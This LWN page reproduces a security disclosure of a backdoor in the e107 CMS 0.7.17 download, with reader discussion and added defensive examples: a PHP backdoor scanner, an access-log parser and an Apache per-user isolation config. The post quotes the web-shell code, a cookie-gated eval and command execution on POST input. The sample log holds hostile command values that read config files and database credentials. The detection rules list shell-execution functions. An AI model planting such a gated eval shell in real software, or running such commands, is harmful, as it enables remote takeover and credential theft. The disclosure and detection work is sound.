
Backdoor in e107 CMS version 0.7.17

From:  Bogdan Calin <bogdan-AT-acunetix.com>
To:  full-disclosure-AT-lists.grok.org.uk
Subject:  e107 latest download link is backdoored
Date:  Mon, 25 Jan 2010 12:58:50 +0200
Message-ID:  <4B5D796A.2020203@acunetix.com>
Cc:  bugtraq-AT-securityfocus.com

Hi guys,

The latest version of e107, version 0.7.17, contains a PHP backdoor.
http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip

I've just downloaded this file and, while looking through the code, I
found the following piece of code:

file: class2.php, line: 1876

if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {

...

if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}

elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}

...

and so on.

I've informed the e107 guys about this situation.
For now, that link is not safe.

Look at the file date: class2.php was modified on 2010-01-23 21:52:26.

-- 
Bogdan Calin - bogdan@acunetix.com
CTO
Acunetix Ltd. - http://www.acunetix.com
Acunetix Web Security Blog - http://www.acunetix.com/blog
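Detecting the pattern quoted in the post: the following is an added example, not part of the mailing list post or of e107, that scans PHP source for the tells of this backdoor (eval or shell functions fed straight from request superglobals, a request value compared against a hard-coded md5, and the specific hash constant from the post). The SAMPLE_BACKDOOR string is a constructed stand-in built from the quoted lines, not the real class2.php, and SAMPLE_CLEAN is an invented benign control.

```python
import re
from pathlib import Path

# Constructed sample: a stripped-down stand-in for the injected class2.php
# excerpt quoted in the post. The cookie-gate hash is the one from the post;
# everything else here is made up to exercise the scanner.
SAMPLE_BACKDOOR = r'''<?php
// ... normal e107 bootstrap code above ...
if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {
    if(!empty($_POST['cmd'])){
        $out = execute($_POST['cmd']);
    }
    elseif(!empty($_POST['php'])){
        ob_start();
        eval($_POST['php']);
        $out = ob_get_contents();
        ob_end_clean();
    }
}
'''

# Constructed benign control: md5 of a password/salt, not of request input.
SAMPLE_CLEAN = r'''<?php
$hash = md5($password . $salt);
if ($hash === $stored) { echo "ok"; }
'''

# Each rule: (name, compiled regex). The patterns are deliberately loose,
# since whitespace and quote style vary between backdoor variants.
RULES = [
    ("eval of request data",
     re.compile(r'\beval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b')),
    ("shell exec of request data",
     re.compile(r'\b(system|exec|shell_exec|passthru|popen|proc_open)'
                r'\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b')),
    ("hash-gated auth on cookie/request value",
     re.compile(r'\bmd5\s*\(\s*\$_(COOKIE|POST|GET|REQUEST)\s*\[[^\]]*\]\s*\)\s*==')),
    ("known e107 0.7.17 backdoor gate hash",
     re.compile(r'cf1afec15669cb96f09befb7d70f8bcb')),
]


def scan_source(src):
    """Return a list of (line_number, rule_name, line_text) hits for one file's text."""
    hits = []
    for lineno, line in enumerate(src.splitlines(), start=1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((lineno, name, line.strip()))
    return hits


def scan_tree(root):
    """Scan every .php file below root; return {path: hits} for files with hits."""
    results = {}
    for path in Path(root).rglob("*.php"):
        try:
            hits = scan_source(path.read_text(errors="replace"))
        except OSError:
            continue
        if hits:
            results[str(path)] = hits
    return results


if __name__ == "__main__":
    for lineno, name, text in scan_source(SAMPLE_BACKDOOR):
        print(f"line {lineno}: {name}: {text}")
    print("clean sample hits:", scan_source(SAMPLE_CLEAN))
```

Run scan_tree against an unpacked download or a live webroot; any hit in a file that is supposed to be a bootstrap include is worth a diff against a known-good copy. The hard-coded hash rule only catches this exact sample (a re-packed backdoor would change the constant), so the generic rules are the ones that matter.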


Backdoor in e107 CMS version 0.7.17

Posted Jan 26, 2010 2:34 UTC (Tue) by busterb (subscriber, #560) [Link] (5 responses)

BTW, it also appears that the linked website is covered in cialis link-spam,
probably a result of the backdoor. Proceed with caution.

Backdoor in e107 CMS version 0.7.17

Posted Jan 26, 2010 14:22 UTC (Tue) by cdman (guest, #63220) [Link] (4 responses)

It seems to be fixed now and they also have a notification on their front page about a security update (although they could have used a bigger font :-)). Also, I couldn't find the given piece of code in their CVS repo, which probably means that only their website got hacked, not a dev...

Backdoor in e107 CMS version 0.7.17

Posted Jan 26, 2010 14:31 UTC (Tue) by johill (subscriber, #25196) [Link] (3 responses)

Are you sure? The security update on their page seems to say that 0.7.17 is the solution, while this article says it is the problem.

Backdoor in e107 CMS version 0.7.17

Posted Jan 27, 2010 6:43 UTC (Wed) by njs (subscriber, #40338) [Link] (2 responses)

There's speculation on full-disclosure (click "Thread" above) that that security announcement about 0.7.17 is to fix a *different* hole... and that this other hole was used to compromise e107.org and insert this backdoor into the 0.7.17 "critical security fix, upgrade now if not sooner" release.

Backdoor in e107 CMS version 0.7.17

Posted Jan 28, 2010 10:34 UTC (Thu) by epa (subscriber, #39769) [Link] (1 responses)

Would using a hashing VCS such as Git have prevented this? If we all became accustomed to instructions such as 'please upgrade to a4732abc41412' rather than 'please download foo-1.2.3.tar.gz', would it become more difficult to insert such backdoors?

Backdoor in e107 CMS version 0.7.17

Posted Jan 28, 2010 19:26 UTC (Thu) by njs (subscriber, #40338) [Link]

In principle it could help, but mostly by making it easier to recover after the repository was compromised (which doesn't seem to have happened here in any case). Presumably they would just change the website to say "please upgrade to 1412a4732abc8" or whatever and no-one would notice that either. Signatures could help in principle, but key management and achieving trust is its own barrel of worms, and these sorts of attacks are surprisingly rare; I'm not sure how much effort it's worth expending to defend against them.

If you *really* want to compromise the users of some project, it's pretty straightforward -- just come up with a plausible pseudonym, and send some legitimate patches that "accidentally" introduce an old-fashioned security bug. All the crypto in the world won't help with that. There are plenty of people you'd expect to be expending real resources on this, too -- militaries, criminals, heck, security researchers (who build their reputation and consulting business through finding bugs). The only reason I can think of that we haven't caught anyone at it yet is that earnest engineers produce enough security holes that people who depend on security holes mostly don't find it worth the bother trying to add more.

e107 + mod_php = evil

Posted Jan 26, 2010 8:36 UTC (Tue) by efexis (guest, #26355) [Link] (1 responses)

Wow. Thanks guys. I've had SO much trouble thanks to that e107 software on a server I semi-manage where e107 was compromised and, with php running as a module within apache, with that single apache user for all virtual hosts, they pulled site config files w/mysql passwords off every other php based site, then all the user accounts details from all those databases, and some stuff even more serious (it was all very nicely logged! That &cmd=xxx ended up in the apache logs as nearly all requests were GETs).

It's such a disastrously insecure setup, yet very common; I'm completely amazed by it. Anyone running php virtual hosts out there, I highly recommend mod_fcgid, a rewrite of the earlier fastcgi that runs well and stably and talks to php instances that run under their own UIDs through pipes. In most cases it shouldn't need changes to existing php code, but in some cases it can do; however, it's so worth it, php should not be run any other way*.

(*or at all, there's -everything else- out there that's better!)
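The log artefact efexis describes (the command arriving as a GET parameter) can be pulled out of an Apache access log mechanically. The following is an added example, not efexis's or e107's code. The log lines are constructed, the hosts and payloads invented, and it assumes the Apache "combined" log format; the backdoor quoted in the post reads `$_POST`, which the access log never records, so the query-string search assumes the variant on the affected server also honoured `cmd`/`php` from `$_GET`/`$_REQUEST`, as efexis's GETs suggest.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample in Apache "combined" format. Hosts, paths and payloads
# are invented to exercise the parser; none of this is a real log.
SAMPLE_LOG = '''\
203.0.113.7 - - [24/Jan/2010:03:12:45 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Jan/2010:03:12:51 +0000] "GET /class2.php?cmd=cat+e107_config.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Jan/2010:03:13:02 +0000] "GET /class2.php?cmd=mysql+-u+root+-pxxx+-e+%27show+databases%27 HTTP/1.1" 200 2044 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Jan/2010:03:14:10 +0000] "POST /class2.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
198.51.100.9 - - [24/Jan/2010:03:15:00 +0000] "GET /news.php?item=cmd&page=2 HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
'''

LINE_RX = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Parameter names the quoted backdoor reads. Matching is on the parameter
# name, so a benign "item=cmd" is not a hit.
SUSPECT_PARAMS = ("cmd", "php")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LINE_RX.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs also URL-decodes, so '+' and %27 come back as the attacker typed them.
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def find_webshell_hits(log_text):
    """Return (ip, timestamp, path, param, decoded_payload) for every request
    that carries a cmd= or php= query parameter."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for param in SUSPECT_PARAMS:
            for value in rec["query"].get(param, []):
                hits.append((rec["ip"], rec["ts"], rec["path"], param, value))
    return hits


def direct_posts(log_text, path):
    """Return parsed records for POST requests to `path`. POST bodies are not in
    the access log, so a POST to the gated file is the only trace the quoted
    $_POST-based backdoor leaves here; the payload itself is gone."""
    return [rec for rec in map(parse_line, log_text.splitlines())
            if rec and rec["method"] == "POST" and rec["path"] == path]


if __name__ == "__main__":
    for ip, ts, path, param, payload in find_webshell_hits(SAMPLE_LOG):
        print(f"{ts} {ip} {path} {param}={payload!r}")
    for rec in direct_posts(SAMPLE_LOG, "/class2.php"):
        print(f"{rec['ts']} {rec['ip']} blind POST to {rec['path']} ({rec['size']} bytes)")
```

The decoded payloads are the thing to act on: every credential that appears in a `cat` or `mysql` command line (and everything those credentials unlock) should be treated as exposed, which is exactly the cross-site cascade efexis describes. Where the backdoor only takes POST, the access log gives you timing and source addresses but not commands, so the POST records are the pivot into whatever other evidence (database logs, shell history, modified files) exists.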

e107 + mod_php = evil

Posted Jan 26, 2010 14:28 UTC (Tue) by cortana (subscriber, #24596) [Link]

Huge AOL on mod_fcgid. I can't understand why it's not used _everywhere_.

I hope it makes it into apache httpd proper some day!
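The per-UID setup efexis and cortana recommend, as an added configuration example that is not from the thread or from the e107 project. It shows an Apache 2.2 vhost under mod_php (the shared-user setup efexis describes) next to the same vhost under mod_fcgid plus mod_suexec. The hostnames, paths and the `sitea` account are invented, and it assumes php-cgi is installed at /usr/bin/php-cgi.

```apache
# BEFORE: mod_php. Every vhost's PHP executes inside the httpd worker, i.e.
# as the one Apache user, so a shell in this site can read every other
# site's e107_config.php and the database credentials in it.
<VirtualHost *:80>
    ServerName site-a.example
    DocumentRoot /srv/www/site-a/htdocs
    AddHandler php5-script .php
</VirtualHost>

# AFTER: mod_fcgid + suexec. php-cgi is started through a per-site wrapper
# that suexec runs as that site's own UID/GID, so a compromised site's view
# of the filesystem and process table stops at its own account.
<VirtualHost *:80>
    ServerName site-a.example
    DocumentRoot /srv/www/site-a/htdocs
    SuexecUserGroup sitea sitea
    <Directory /srv/www/site-a/htdocs>
        Options +ExecCGI
        AddHandler fcgid-script .php
        FcgidWrapper /srv/www/site-a/fcgi-bin/php-wrapper .php
    </Directory>
</VirtualHost>

# /srv/www/site-a/fcgi-bin/php-wrapper, owned by sitea:sitea, mode 0755
# (suexec refuses a wrapper that is group/world writable or owned by the
# wrong user):
#   #!/bin/sh
#   exec /usr/bin/php-cgi
```

Repeat the block per vhost with a distinct user, then make the isolation mean something: each site's config file (for e107, e107_config.php) should be owned by that site's user with mode 0600, otherwise the separate UIDs still all read each other's database passwords. suexec also insists that the wrapper live below its compiled-in document root and that the target user's UID be above its configured minimum, so check `suexec -V` before assuming the setup works.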


Copyright © 2010, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds